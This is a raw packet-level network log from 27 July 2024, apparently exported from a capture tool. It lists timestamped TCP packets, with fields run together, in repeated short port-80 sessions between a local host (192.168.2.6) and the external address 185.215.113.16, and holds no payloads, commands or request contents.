                      Jul 27, 2024 09:35:04.854449034 CEST4972180192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:04.855166912 CEST4972180192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:04.862978935 CEST8049721185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:05.128138065 CEST8049721185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:05.128216982 CEST4972180192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:05.237900972 CEST4972180192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:05.238234043 CEST4972280192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:05.243969917 CEST8049722185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:05.243993998 CEST8049721185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:05.244086981 CEST4972180192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:05.244261026 CEST4972280192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:05.244261026 CEST4972280192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:05.249320030 CEST8049722185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:06.046369076 CEST8049722185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:06.046518087 CEST4972280192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:06.047327042 CEST4972280192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:06.052282095 CEST8049722185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:06.294701099 CEST8049722185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:06.294784069 CEST4972280192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:06.409843922 CEST4972280192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:06.410218000 CEST4972380192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:06.415071011 CEST8049723185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:06.415117025 CEST8049722185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:06.415167093 CEST4972380192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:06.415201902 CEST4972280192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:06.415327072 CEST4972380192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:06.420255899 CEST8049723185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:07.175765991 CEST8049723185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:07.175863028 CEST4972380192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:07.176584959 CEST4972380192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:07.181358099 CEST8049723185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:07.425575018 CEST8049723185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:07.425685883 CEST4972380192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:07.534929037 CEST4972380192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:07.535424948 CEST4972480192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:07.541186094 CEST8049724185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:07.541291952 CEST4972480192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:07.541480064 CEST4972480192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:07.541599035 CEST8049723185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:07.541666031 CEST4972380192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:07.546322107 CEST8049724185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:08.305969000 CEST8049724185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:08.306072950 CEST4972480192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:08.306699991 CEST4972480192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:08.311647892 CEST8049724185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:08.554152012 CEST8049724185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:08.554234028 CEST4972480192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:08.660367966 CEST4972480192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:08.660896063 CEST4972580192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:08.666225910 CEST8049725185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:08.666342974 CEST4972580192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:08.666352987 CEST8049724185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:08.666412115 CEST4972480192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:08.666590929 CEST4972580192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:08.671480894 CEST8049725185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:09.411015987 CEST8049725185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:09.411290884 CEST4972580192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:09.411914110 CEST4972580192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:09.417224884 CEST8049725185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:09.661366940 CEST8049725185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:09.661452055 CEST4972580192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:09.769181013 CEST4972580192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:09.769383907 CEST4972680192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:09.774420023 CEST8049726185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:09.774770975 CEST4972680192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:09.774810076 CEST8049725185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:09.774835110 CEST4972680192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:09.774868011 CEST4972580192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:09.780049086 CEST8049726185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:10.546828032 CEST8049726185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:10.547024012 CEST4972680192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:10.547522068 CEST4972680192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:10.552553892 CEST8049726185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:10.800358057 CEST8049726185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:10.800447941 CEST4972680192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:10.910121918 CEST4972680192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:10.910195112 CEST4972880192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:10.915911913 CEST8049726185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:10.916110992 CEST4972680192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:10.916271925 CEST8049728185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:10.916352034 CEST4972880192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:10.916477919 CEST4972880192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:10.923084974 CEST8049728185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:11.670475006 CEST8049728185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:11.670558929 CEST4972880192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:11.672993898 CEST4972880192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:11.678400993 CEST8049728185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:11.917912960 CEST8049728185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:11.917999029 CEST4972880192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:12.019124985 CEST4972880192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:12.019452095 CEST4972980192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:12.025544882 CEST8049728185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:12.025590897 CEST8049729185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:12.025624037 CEST4972880192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:12.025806904 CEST4972980192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:12.025892973 CEST4972980192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:12.031219959 CEST8049729185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:13.738756895 CEST8049729185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:13.739087105 CEST4972980192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:13.739223003 CEST8049729185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:13.739362001 CEST8049729185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:13.739418983 CEST4972980192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:13.739418983 CEST4972980192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:13.739873886 CEST4972980192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:13.740161896 CEST8049729185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:13.740225077 CEST4972980192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:13.978324890 CEST8049729185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:14.227438927 CEST8049729185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:14.227657080 CEST4972980192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:14.331931114 CEST4972980192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:14.332381010 CEST4973080192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:14.340048075 CEST8049730185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:14.340089083 CEST8049729185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:14.340269089 CEST4973080192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:14.340269089 CEST4972980192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:14.340356112 CEST4973080192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:14.345709085 CEST8049730185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:15.177979946 CEST8049730185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:15.178284883 CEST4973080192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:15.179322004 CEST4973080192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:15.186068058 CEST8049730185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:15.426304102 CEST8049730185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:15.426548004 CEST4973080192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:15.535121918 CEST4973080192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:15.535450935 CEST4973180192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:15.540545940 CEST8049731185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:15.540673971 CEST4973180192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:15.540766954 CEST4973180192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:15.541040897 CEST8049730185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:15.541256905 CEST4973080192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:15.546411991 CEST8049731185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:16.278747082 CEST8049731185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:16.278994083 CEST4973180192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:16.279750109 CEST4973180192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:16.285676956 CEST8049731185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:16.526026011 CEST8049731185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:16.526344061 CEST4973180192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:16.628541946 CEST4973180192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:16.628962040 CEST4973280192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:16.634563923 CEST8049732185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:16.634820938 CEST4973280192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:16.634820938 CEST4973280192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:16.636991978 CEST8049731185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:16.637058020 CEST4973180192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:16.643404961 CEST8049732185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:17.435533047 CEST8049732185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:17.436069965 CEST4973280192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:17.436959028 CEST4973280192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:17.442595959 CEST8049732185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:17.683476925 CEST8049732185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:17.683685064 CEST4973280192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:17.784956932 CEST4973280192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:17.785120964 CEST4973380192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:17.790266991 CEST8049733185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:17.790360928 CEST4973380192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:17.790524006 CEST4973380192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:17.793190002 CEST8049732185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:17.793405056 CEST4973280192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:17.796739101 CEST8049733185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:18.540328979 CEST8049733185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:18.540543079 CEST4973380192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:18.541156054 CEST4973380192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:18.547075033 CEST8049733185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:18.788273096 CEST8049733185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:18.788460970 CEST4973380192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:18.894614935 CEST4973380192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:18.894762039 CEST4973480192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:18.908466101 CEST8049734185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:18.908586025 CEST4973480192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:18.908792019 CEST4973480192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:18.910249949 CEST8049733185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:18.910336018 CEST4973380192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:18.920718908 CEST8049734185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:19.694700956 CEST8049734185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:19.694828987 CEST4973480192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:19.695584059 CEST4973480192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:19.700917959 CEST8049734185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:19.946804047 CEST8049734185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:19.946939945 CEST4973480192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:20.050510883 CEST4973480192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:20.050852060 CEST4973580192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:20.057437897 CEST8049734185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:20.057483912 CEST8049735185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:20.057534933 CEST4973480192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:20.057751894 CEST4973580192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:20.057841063 CEST4973580192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:20.062745094 CEST8049735185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:20.808569908 CEST8049735185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:20.808676958 CEST4973580192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:20.811388969 CEST4973580192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:20.816725016 CEST8049735185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:21.058656931 CEST8049735185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:21.058973074 CEST4973580192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:21.175977945 CEST4973580192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:21.176348925 CEST4973780192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:21.181559086 CEST8049735185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:21.181643963 CEST4973580192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:21.182286024 CEST8049737185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:21.182384968 CEST4973780192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:21.182579994 CEST4973780192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:21.187870979 CEST8049737185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:21.943689108 CEST8049737185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:21.943799973 CEST4973780192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:21.944624901 CEST4973780192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:21.949970007 CEST8049737185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:22.195077896 CEST8049737185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:22.195302010 CEST4973780192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:22.300405979 CEST4973780192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:22.300623894 CEST4973880192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:22.508069992 CEST8049738185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:22.508321047 CEST4973880192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:22.508475065 CEST4973880192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:22.513941050 CEST8049738185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:22.525743008 CEST8049737185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:22.525907993 CEST4973780192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:23.267412901 CEST8049738185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:23.267496109 CEST4973880192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:23.268232107 CEST4973880192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:23.295969963 CEST8049738185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:23.579539061 CEST8049738185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:23.579755068 CEST4973880192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:23.691232920 CEST4973880192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:23.691585064 CEST4973980192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:23.697283030 CEST8049739185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:23.697371960 CEST4973980192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:23.697460890 CEST4973980192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:23.698332071 CEST8049738185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:23.698398113 CEST4973880192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:23.702755928 CEST8049739185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:24.446705103 CEST8049739185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:24.446971893 CEST4973980192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:24.447643995 CEST4973980192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:24.454125881 CEST8049739185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:24.822426081 CEST8049739185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:24.822760105 CEST4973980192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:24.925352097 CEST4973980192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:24.925657034 CEST4974080192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:24.935830116 CEST8049740185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:24.935904980 CEST4974080192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:24.936054945 CEST4974080192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:24.936470985 CEST8049739185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:24.936563969 CEST4973980192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:24.941952944 CEST8049740185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:25.850984097 CEST8049740185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:25.851284981 CEST4974080192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:25.852160931 CEST4974080192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:25.858725071 CEST8049740185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:26.133748055 CEST8049740185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:26.133896112 CEST4974080192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:26.237968922 CEST4974080192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:26.238305092 CEST4974180192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:26.243957043 CEST8049741185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:26.244216919 CEST4974180192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:26.244283915 CEST4974180192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:26.244400024 CEST8049740185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:26.244472980 CEST4974080192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:26.250053883 CEST8049741185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:26.995523930 CEST8049741185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:26.995804071 CEST4974180192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:26.996520042 CEST4974180192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:27.002341986 CEST8049741185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:27.258722067 CEST8049741185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:27.259007931 CEST4974180192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:27.363230944 CEST4974180192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:27.363452911 CEST4974280192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:27.369240999 CEST8049742185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:27.369515896 CEST4974280192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:27.369517088 CEST4974280192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:27.369844913 CEST8049741185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:27.370069981 CEST4974180192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:27.375349045 CEST8049742185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:28.113677025 CEST8049742185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:28.113907099 CEST4974280192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:28.114548922 CEST4974280192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:28.120266914 CEST8049742185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:28.362354040 CEST8049742185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:28.362445116 CEST4974280192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:28.472579002 CEST4974280192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:28.472794056 CEST4974380192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:28.477926016 CEST8049742185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:28.478045940 CEST4974280192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:28.478157043 CEST8049743185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:28.478220940 CEST4974380192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:28.478334904 CEST4974380192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:28.483762026 CEST8049743185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:29.219233990 CEST8049743185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:29.219592094 CEST4974380192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:29.220431089 CEST4974380192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:29.226181984 CEST8049743185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:29.468216896 CEST8049743185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:29.468570948 CEST4974380192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:29.583395004 CEST4974380192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:29.583672047 CEST4974480192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:29.588685036 CEST8049744185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:29.588769913 CEST4974480192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:29.588962078 CEST4974480192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:29.589473009 CEST8049743185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:29.589540958 CEST4974380192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:29.593875885 CEST8049744185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:30.354145050 CEST8049744185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:30.354635000 CEST4974480192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:30.355257034 CEST4974480192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:30.360788107 CEST8049744185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:30.604315042 CEST8049744185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:30.604568958 CEST4974480192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:30.707694054 CEST4974480192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:30.711251020 CEST4974580192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:30.713546038 CEST8049744185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:30.713613033 CEST4974480192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:30.716552973 CEST8049745185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:30.716644049 CEST4974580192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:30.716896057 CEST4974580192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:30.722589016 CEST8049745185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:31.473229885 CEST8049745185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:31.473535061 CEST4974580192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:31.474073887 CEST4974580192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:31.479526997 CEST8049745185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:31.724093914 CEST8049745185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:31.724308968 CEST4974580192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:31.831825018 CEST4974580192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:31.832138062 CEST4974680192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:31.838061094 CEST8049745185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:31.838243008 CEST4974580192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:31.838630915 CEST8049746185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:31.838722944 CEST4974680192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:31.838891983 CEST4974680192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:31.844400883 CEST8049746185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:32.624861956 CEST8049746185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:32.625050068 CEST4974680192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:32.625649929 CEST4974680192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:32.630506992 CEST8049746185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:32.878212929 CEST8049746185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:32.878432989 CEST4974680192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:32.988171101 CEST4974680192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:32.988535881 CEST4974780192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:32.993546009 CEST8049747185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:32.993628025 CEST4974780192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:32.993767977 CEST4974780192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:32.994155884 CEST8049746185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:32.994342089 CEST4974680192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:32.998859882 CEST8049747185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:33.735363007 CEST8049747185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:33.735815048 CEST4974780192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:33.736378908 CEST4974780192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:33.741950989 CEST8049747185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:33.992743015 CEST8049747185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:33.992851019 CEST4974780192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:34.097467899 CEST4974780192.168.2.6185.215.113.16
